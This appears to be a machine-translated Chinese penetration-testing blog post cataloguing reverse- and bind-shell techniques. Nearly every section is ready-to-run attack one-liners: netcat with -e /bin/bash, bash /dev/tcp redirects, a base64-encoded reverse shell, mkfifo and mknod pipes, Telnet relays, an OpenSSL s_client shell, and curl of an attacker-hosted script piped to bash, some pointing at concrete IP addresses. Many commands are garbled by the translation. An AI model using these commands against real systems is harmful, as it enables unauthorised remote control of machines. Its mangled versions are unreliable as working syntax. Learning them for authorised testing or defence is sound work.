The article directories

  • Related blog
  • Rebound Shell introduction
  • Common rebound mode
    • NetCat (NC) rebounded
      • Forward NC
      • Reverse NC
    • Telnet rebound
      • Positive shell
      • Reverse shell
    • OpenSSL
    • Curl

Related blog

  1. Linux common commands for information collection and penetration testing: Xunmi.blog.csdn.net/article/det… (If you don’t knowredirectandStandard file operatorsBe sure to check out these two sections of this blog, otherwise you may not understand how the bounce shell commands work below!!
  2. Mention right methods commonly used Linux: xunmi.blog.csdn.net/article/det…
  3. Penetration test commonly used rebound shell method (how to penetration test rebound shell? : xunmi.blog.csdn.net/article/det…

Rebound Shell introduction

The rebound shell basically allows us to remotely connect to the target console and give instructions to control the target asset! Rebound shell is divided into:

  1. Forward rebound: The way in which the control (our own machine) sends a request to connect to the controlled (the target machine).

    However, this approach will be affected by many factors, such as firewall, routing, etc., and it is difficult to succeed.

  2. Reverse rebound: the controlled end actively sends a request to connect to our control end.

    This method is to find a way to avoid firewall and routing restrictions!

Common rebound mode

Test machine:

  1. Kali: 192.168.1.200(can be connected to the Internet, I usually use it as the attack aircraft, the control end)
  2. Contos7:43.128.11.131(A VPS of Tencent Cloud. I usually use it as a regular server and the controlled end)

NetCat (NC) rebounded

No matter Windows or Linux, NC can be used for rebound.

Forward NC

In the forward case, we need to enable the monitoring of the specified port on the controlled end first, and then use the control end to connect

Controlled (l: listening mode, P: specified port number, V: detailed information (the information here refers to the instruction execution process), VV is more detailed information)Nc-lvvp port number -e Sh used#, such as:
nc -lvvp 4578 -e /bin/bash
The control side #Nc Target IP Port number# such asNc 43.128.11.131 4578# MSF attack load (it is not recommended to use NC as MSF forward connection tool, the stability is poor, generally only online shell, it is difficult to obtain stable meterpreter)
payload/cmd/unix/bind_netcat
payload/cmd/unix/reverse_netcat
Copy the code

Reverse NC

Was charged with the reverse shell sort very much, you can use the online tool to generate: weibell. Making. IO/reverse – she… Below I will analyze some commonly used controlled side reverse shell command principle in detail! Most scenarios of using forward shell are already in the target Intranet, and there are almost no security measures. Generally, no attention is paid to the detection of how to bypass the firewall to kill software. However, reverse shell is different. Generally, reverse shell attacks the machines that are connected to the external network. Such machines generally have some security measures. (Take a look at my Linux Penetration test command basics blog if you can’t read this!) Rebound shell base that part of the explanation!

# Control terminal:Nc - LVVP port# Controlled end:Nc-e /bin/bash IP port numberCopy the code

A shell that uses nc bounce directly is not very stable and may not have the -e argument (-e: Program redirection, once the connection is executed, this is a dangerous parameter, so the target NC may not support this parameter), at this time we also have some of the controlled end of the rebound shell command can also be self, and is fully compatible with the control end nc command!

# Other rebound shell commands
# The most basic command, there is a detailed explanation belowBash -i > &/dev/tcp/ip/port0 >&1## this command is equivalent to the one above, just written a little differently!Bash -i > /dev/tcp/ip/port0 >&1 2>&1## 'exec 5<> /dev/tcp/ip/port
## 'cat <&5' here is reading our custom file descriptor file and passing it to the following command using pipe characters
## `while read line; Do $line 2>&5 >&5 'create a variable line, then read each segment of the data from the previous step and redirect both standard output and error output to our custom file descriptor 5
exec< 5 > / dev/TCP/IP/port. cat <&5 |while read line; do $line2 > & > 5 & 5;done
The file descriptor created here is 181, and the input is redirected to 181 at the beginning of the file descriptor.181-0 < &;execThe < 181 > / dev/TCP/IP/port; sh <&181 >&181 2>&181This is the same as the first command, but with an extra layer of base64 encoding!
bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC/nq6/lj6MgMD4mMQ==|base64 -d|bash -i"
# MSF attack payload
cmd/unix/bind_netcat
cmd/unix/reverse_netcat
Copy the code





If the target machine/dev/tcpAlso cannot use, this can try using the following method!

rm /tmp/f; mkfifo /tmp/f; Cat/TMP/f | / bin/bash -i 2 > &1 | nc IP port > / TMP/f mknod backpipe p; Nc IP port 0 < backpipe | / bin/bash 1 > 2 > backpipe backpipe# generate using MSF
# # such asMsfvenom -p CMD/Unix /reverse_netcat lhost=192.168.1.1 lport=4578 -f raw mkFIFo/TMP /ysngi; Nc 192.168.1.1 4578 0 < / TMP/ysngi | / bin/sh > / TMP/ysngi 2 > &1; rm /tmp/ysngiCopy the code
  1. Rm/TMP/temporary files; Mkfifo/TMP/temporary file; Temporary file | / cat/TMP/bin/bash -i 2 > &1 | nc IP port > / TMP/temporary files

    1. Rm/TMP/temporary files: Delete temporary files first to avoid conflicts. Statements execute the following commands one by one.

    2. Mkfifo/TMP/temporary file: mkfifoPipe command is used to create a pipe command in Linux. It can be used to create a pipe command in one terminal. After passing a command, it can be received by another terminal to obtain data (using redirection characters)<Words can continue to receive! Such asCat < temporary file).

    3. Temporary file | / cat/TMP/bin/bash -i 2 > &1 | nc IP port > / TMP/temporary files

      1. Cat/TMP/temporary files: First reads the newly created temporary file and passes the contents to the next command through pipe characters
      2. / bin/bash -i 2 > &1 | nc IP port > / TMP/temporary files: Execute the command obtained in the previous step in the bash terminal, output the result to the target through NC, and write the command of the target into a temporary file

    MSF can automatically generate this command quickly!

  2. mknod backpipe p; Nc IP port 0 < backpipe | / bin/bash 1 > 2 > backpipe backpipe

    1. Mknod device name p: Create character device files and block device files. Create P here means create A FIFO(named pipe)

Telnet rebound

The Telnet command is used to log in to and manage a remote host. It is the predecessor of SSH, but it has been gradually abandoned because it is far less secure than SSH and even uses plaintext to transmit data. But we can still use it to try bouncing shells on machines that still have Telnet enabled.

Positive shell

# Attack aircraft enable two ports for listening: one for input and one for outputNc-lvvp input port NC-LVVP output port# the targetTelnet 47.101.214.85 input port | / bin/bash | Telnet 47.101.214.85 output portCopy the code

Reverse shell

# attackNc - LVVP port# Target machine:The rm -f a && mknod a p && Telnet IP port 0 < a | 1 > / bin/bash a rm -f a; mknod a p; Telnet IP port 0 < a | / bin/bash > 1 aCopy the code

OpenSSL

SSL is a secure socket protocol, and OpenSSL is a powerful Secure socket layer password library in Linux system. First we use this library to bounce the shell, which needs to generate a secret key file

# Generate the secret key (generated on our attacker)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Enable listening in the attack plane (execute in the folder where you previously generated the secret keys)
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
Bounce the shell on the target machinemkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect IP:443 > /tmp/s; rm /tmp/sCopy the code

All options can be selected by default (here I have changed the region to what I think is China, I am not sure it is correct, but it does not affect)



Curl

Yes, this is the download command in Linux system, because sometimes the Webshell we take down has some filtering mechanism, will filter out some keywords in our rebound shell, leading to rebound failure, at this time we can try to use this method to execute! The first step is to create an index. HTML file in the public network server and write the bounce shell command into it. Then start the HTTP service and listen to the port specified by the previous bounce shell command.

# attack side:
echo 'bash -i >& /dev/tcp/ip/port ' > index.html
# such as
echo 'bash - > & I/dev/TCP / 43.128.11.131/4545' > index.html
# here & is to make this command run in the background
python3 -m http.server &
nc -lvvp 4545 
# Target machine:The curl 43.128.11.131:8000 | bashCopy the code